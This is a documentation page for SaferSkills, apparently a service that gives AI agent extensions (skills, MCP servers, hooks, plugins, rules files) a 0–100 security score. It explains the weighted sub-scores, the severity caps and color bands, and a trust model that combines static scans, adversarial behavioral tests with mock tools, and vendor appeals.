Skip to content

Core Concepts

SaferSkills rests on three ideas. First, the unit of analysis is a capability — a skill, MCP server, hook, plugin, or rules file. Second, every capability gets a 0–100 score from five weighted sub-scores, bucketed into four color bands. Third, the trust model combines a static component scan, a behavioral Agent Scan, and a structural vendor right-of-reply. This page maps all three in one screen.

A capability is one indexable, scorable AI extension. There are five kinds, and one repository can hold several — each is discovered and scored independently.

  • Skill — the SKILL.md instruction format; text the agent loads as trusted instructions. Fully scanned today.
  • MCP server — a Model Context Protocol tool server the agent talks to; its tool descriptions are a key attack surface. Fully scanned today.
  • Hook — a lifecycle shell script that fires on agent events.
  • Plugin — a packaged bundle that can decompose into nested capabilities.
  • Rules — an editor rule file (for example a Cursor .mdc) the editor applies to model behavior.

Skills and MCP servers are fully scanned in v1; the hooks, plugins, and rules categories exist in the rubric and are scored where coverage applies. Each capability links to its own /items/<slug> report. See the glossary for precise definitions of every term used here.

The aggregate score runs 0–100 and is a weighted sum of five sub-scores:

Sub-scoreWeightWhat it catches
Security35%Prompt injection, obfuscation, dangerous shell, credential exfiltration
Supply Chain20%Typosquat, owner-transfer, hash-drift (rug-pull), unsigned releases
Maintenance15%Commit recency, commit frequency, issue-response time, CI health
Transparency15%LICENSE / README / CHANGELOG / SECURITY.md / manifest presence
Community15%Stars, contributors, cross-registry presence, fork health

Each sub-score starts at 100 and loses per-finding penalties: info 0 · low 5 · medium 12 · high 25 · critical 40. A sub-score is max(0, 100 − Σ penalties), and a sub-score with any critical finding caps at ≤20. The aggregate is round(0.35·security + 0.20·supply + 0.15·maintenance + 0.15·transparency + 0.15·community). The deeper math lives in how scoring works and the five sub-scores page.

The aggregate maps to four color bands: Green (≥80, Approved), Yellow (60–79, Watch), Orange (40–59, Caution), and Red (0–39, Block). Severity tiers run info (advisory, zero weight), low, medium, high, and critical. The bands are advisory, not instructions — a low band means review before use, in keeping with the methodology-over-opinion stance.

Why can a single finding dominate the score?

Section titled “Why can a single finding dominate the score?”

Because security must not be diluted by the 65% non-security weight. A severity ceiling caps the whole aggregate by the worst active finding: one active critical caps the aggregate at ≤15, and one active high caps it at ≤45. So a capability with a critical credential-exfiltration finding lands solidly red even if its docs, stars, and maintenance are pristine. This structural ceiling is what makes a serious flaw unmissable; see how scoring works for the exact rule.

Determinism. Scoring is closed-form with no LLM in the verdict path — no model, no seed, no temperature. Every scan stamps rubric_version, engine_version, and ref_sha (or content_hash_sha256 for an upload), so a vendor can re-derive any verdict offline. Every finding carries a rule_id and a quotable line of evidence, and the persisted scan trace stores hashes and positions only, never raw payload. The same input always produces the same score.

The trust model has three parts that reinforce each other:

  • Static component scan — analyzes a capability’s files without running them, against the documented detection categories.
  • Agent Scan — grades a running agent behaviorally against a pack of adversarial tests, using mock tools only (zero real side effects), with the identical scoring model. Verdicts use observation language (“observed vulnerable” / “not observed under pack v”), never “secure” or “certified.”
  • Vendor right-of-reply — every verdict is appealable. A verified vendor gets a substantive public response within one hour, and findings are annotated with the appeal outcome, never silently deleted. The process is documented in disputing findings.

For each capability kind in depth, read the skills, MCP servers, hooks, and plugins pages. For the scoring model, continue to how scoring works; for the behavioral side, see the Agent Scan overview. Every term on this page is defined in the glossary.